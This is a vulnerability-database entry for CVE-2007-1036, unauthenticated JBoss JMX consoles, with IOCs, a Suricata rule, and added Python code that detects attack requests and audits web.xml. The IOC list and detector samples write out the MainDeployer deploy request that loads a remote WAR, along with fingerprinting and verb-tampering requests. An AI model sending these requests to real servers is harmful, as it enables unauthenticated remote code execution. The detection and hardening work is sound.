CVE-2007-1036
published 2007-02-21


Priority: P1 (87), high
CVSS 2.0: 7.5 (high), vector AV:N/AC:L/Au:N/C:P/I:P/A:P
Tags: exploited in the wild (ITW), public exploit, VulnCheck KEV, ransomware
EPSS: 81.83% (99.6th percentile)
The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.

Affected (2 ranges)

Vendor  Product           Version range  Fixed in
hp      procurve_manager  (not listed)   (not listed)
hp      procurve_manager  (not listed)   (not listed)

Detection & IOCs (extracted from sources)

path: /jmx-console/HtmlAdaptor
path: /jmx-console
path: /invoker/JMXInvokerServlet
port: 8080
path: /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
command: action=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy&argType=java.lang.String&arg0=<WAR_URL>
other: Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
IDS rule (Emerging Threats sid 2015747; the http.method/http.uri sticky buffers are Suricata syntax, although the source lists it under "snort"):
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible JBoss/JMX InvokerServlet Auth Bypass Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/invoker/JMXInvokerServlet/"; nocase; reference:cve,2007-1036; reference:url,exploit-db.com/exploits/21080/; classtype:web-application-attack; sid:2015747; rev:4; metadata:created_at 2012_09_28, cve CVE_2007_1036, confidence Medium, signature_severity Major, updated_at 2020_04_22;)
  • Detect unauthenticated POST requests to /jmx-console/HtmlAdaptor with 'invokeOpByName' and 'MainDeployer' parameters, indicating WAR deployment via JMX Console.
  • Detect POST requests to /invoker/JMXInvokerServlet with Content-Type 'application/x-java-serialized-object' — indicates JMXInvokerServlet abuse for unauthenticated WAR deployment.
  • Monitor for HTTP requests to /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo — used by attackers for automated platform fingerprinting prior to exploitation.
  • Alert on HTTP verbs other than GET or POST (e.g., HEAD) targeting /jmx-console/HtmlAdaptor: public exploits send such verbs because a security-constraint that lists only GET and POST leaves every other verb ungated (CVE-2010-0738 chaining).
  • Check for JBoss version strings 'CVSTag=Branch_4_', 'SVNTag=JBoss_4_', or 'SVNTag=JBoss_5_' in HTTP responses to /invoker/JMXInvokerServlet — these indicate vulnerable JBoss 4.x/5.x targets.
  • The exploit only works if the target JBoss server can make outbound HTTP connections back to the attacker (for WAR retrieval via MainDeployer). Egress filtering will block this attack vector.
  • The DeploymentFileRepository-based attack path (via JMXInvokerServlet) is only applicable to JBoss 4.x and 5.x.
  • The vulnerability stems from the default JBoss configuration leaving the console and web management interfaces unauthenticated; securing these interfaces per the JBoss Application Server Guide mitigates the risk.
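The detection bullets above, turned into code. This is an added example, not code from the source or from JBoss: it parses captured HTTP requests (the kind a proxy, WAF or full-packet capture provides, since an access log does not carry POST bodies or request Content-Type) and reports which of the listed indicators each one matches. The sample requests, the host name jboss.example and the serialized body stand-in are constructed; <WAR_URL> is the page's own placeholder.

```python
"""Match captured HTTP requests against the CVE-2007-1036 indicators listed
above. Added example (not code from the page or from JBoss); the sample
requests are constructed and the body of the serialized one is a stand-in."""
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit


@dataclass
class Request:
    method: str
    target: str                                  # e.g. /jmx-console/HtmlAdaptor?action=...
    headers: dict = field(default_factory=dict)  # header names lower-cased
    body: str = ""


def parse_http_request(raw: str) -> Request:
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method.upper(), target, headers, body)


def detect(req: Request) -> list[str]:
    """Return the indicator names this request matches (empty list if none)."""
    hits = []
    parts = urlsplit(req.target)
    path = parts.path.lower()
    # The JMX console reads its parameters from the query string (GET) or the
    # form body (POST); merge both so either encoding is caught.
    params = {**parse_qs(parts.query), **parse_qs(req.body)}
    actions = [a.lower() for a in params.get("action", [])]
    names = " ".join(params.get("name", [])).lower()
    ctype = req.headers.get("content-type", "").lower()

    if path.startswith("/jmx-console/"):
        # A security-constraint listing only GET and POST leaves other verbs
        # ungated (CVE-2010-0738), so any other verb is suspicious by itself.
        if req.method not in ("GET", "POST"):
            hits.append("jmx-console verb tampering")
        if req.method == "POST" and "invokeopbyname" in actions and "maindeployer" in names:
            hits.append("jmx-console MainDeployer deploy")
        if "inspectmbean" in actions and "jboss.system:type=serverinfo" in names:
            hits.append("jmx-console ServerInfo fingerprint")
    if (path.startswith("/invoker/jmxinvokerservlet") and req.method == "POST"
            and "application/x-java-serialized-object" in ctype):
        hits.append("JMXInvokerServlet serialized invocation")
    return hits


# Constructed sample requests; <WAR_URL> is the page's placeholder.
SAMPLES = {
    "fingerprint": ("GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo HTTP/1.1\r\n"
                    "Host: jboss.example:8080\r\n\r\n"),
    "deploy": ("POST /jmx-console/HtmlAdaptor HTTP/1.1\r\nHost: jboss.example:8080\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
               "action=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy"
               "&argType=java.lang.String&arg0=<WAR_URL>"),
    "invoker": ("POST /invoker/JMXInvokerServlet/ HTTP/1.1\r\nHost: jboss.example:8080\r\n"
                "Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n\r\n"
                "<serialized MarshalledInvocation stand-in>"),
    "head": "HEAD /jmx-console/HtmlAdaptor HTTP/1.1\r\nHost: jboss.example:8080\r\n\r\n",
    "benign": "GET /index.html HTTP/1.1\r\nHost: jboss.example:8080\r\n\r\n",
}


def scan_samples() -> dict[str, list[str]]:
    """Run detect() over every constructed sample; used as the worked result."""
    return {name: detect(parse_http_request(raw)) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:12s} {hits or '-'}")
```

The MainDeployer and ServerInfo checks match on the decoded parameter values rather than on a raw substring of the URI, so URL-encoded variants of name= and action= are caught as well; the Suricata rule above is the equivalent check at the IDS layer for the invoker path only.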
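The last bullet says the fix is to secure the interfaces, and the HEAD bullet shows how a half-done fix fails. As an added example (not JBoss code and not from the source), the check below audits a console web.xml for both conditions: no security-constraint at all (the unauthenticated default behind CVE-2007-1036) and a constraint whose http-method elements list only GET and POST (the CVE-2010-0738 bypass). The three descriptors are constructed, modelled on the stock jmx-console web.xml with the servlet definitions omitted; the role name JBossAdmin and realm name are assumptions.

```python
"""Audit a JBoss console web.xml for the unauthenticated default behind
CVE-2007-1036 and for the GET/POST-only security-constraint that verb
tampering bypasses (CVE-2010-0738). Added example, not JBoss code; the three
web.xml samples are constructed, modelled on the stock jmx-console descriptor."""
import xml.etree.ElementTree as ET


def _local(tag: str) -> str:
    """Strip the namespace: Servlet 2.4+ descriptors carry a default xmlns."""
    return tag.rsplit("}", 1)[-1]


def _texts(elem, name: str) -> list[str]:
    """Text of every descendant element with the given local tag name."""
    return [(e.text or "").strip() for e in elem.iter() if _local(e.tag) == name]


def audit_web_xml(xml_text: str) -> list[str]:
    """Return findings; an empty list means every verb on /* requires a login."""
    root = ET.fromstring(xml_text)
    findings = []
    constraints = [e for e in root.iter() if _local(e.tag) == "security-constraint"]
    if not constraints:
        findings.append("no security-constraint: every request is served unauthenticated (CVE-2007-1036)")
    for sc in constraints:
        patterns = _texts(sc, "url-pattern")
        methods = _texts(sc, "http-method")
        roles = _texts(sc, "role-name")
        if "/*" not in patterns:
            findings.append(f"constraint covers {patterns}, not /*")
        if methods:
            # Listing methods makes the constraint apply only to those; HEAD and
            # every other verb reach the servlet without authentication.
            findings.append(f"http-method limits the constraint to {methods}; other verbs bypass it (CVE-2010-0738)")
        if not roles:
            findings.append("no auth-constraint/role-name: the constraint does not require a login")
    if not any(_local(e.tag) == "login-config" for e in root.iter()):
        findings.append("no login-config: no authentication mechanism is defined")
    return findings


# Constructed descriptors (servlet and servlet-mapping elements omitted).
DEFAULT_WEB_XML = """<web-app>
  <!-- servlet and servlet-mapping for HtmlAdaptor omitted -->
</web-app>"""

VERB_GATED_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
  <login-config><auth-method>BASIC</auth-method><realm-name>JBoss JMX Console</realm-name></login-config>
  <security-role><role-name>JBossAdmin</role-name></security-role>
</web-app>"""

HARDENED_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
  <login-config><auth-method>BASIC</auth-method><realm-name>JBoss JMX Console</realm-name></login-config>
  <security-role><role-name>JBossAdmin</role-name></security-role>
</web-app>"""


def audit_samples() -> dict[str, list[str]]:
    """Audit all three constructed descriptors; used as the worked result."""
    return {name: audit_web_xml(x) for name, x in
            [("default", DEFAULT_WEB_XML), ("verb-gated", VERB_GATED_WEB_XML), ("hardened", HARDENED_WEB_XML)]}


if __name__ == "__main__":
    for name, findings in audit_samples().items():
        print(name, findings or "ok")
```

On a JBoss 4.x layout the descriptors to point this at are deploy/jmx-console.war/WEB-INF/web.xml, deploy/management/console-mgr.sar/web-console.war/WEB-INF/web.xml and, for /invoker/JMXInvokerServlet, deploy/http-invoker.sar/invoker.war/WEB-INF/web.xml; the constraint only takes effect when the matching jboss-web.xml binds a security-domain, so the audit is a descriptor lint and not a substitute for an unauthenticated HEAD and POST against the live endpoints.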

CVSS provenance

Source         Version  Score  Severity  Vector
nvd            2.0      7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck      -        7.5    HIGH      -
vendor_redhat  -        7.5    HIGH      -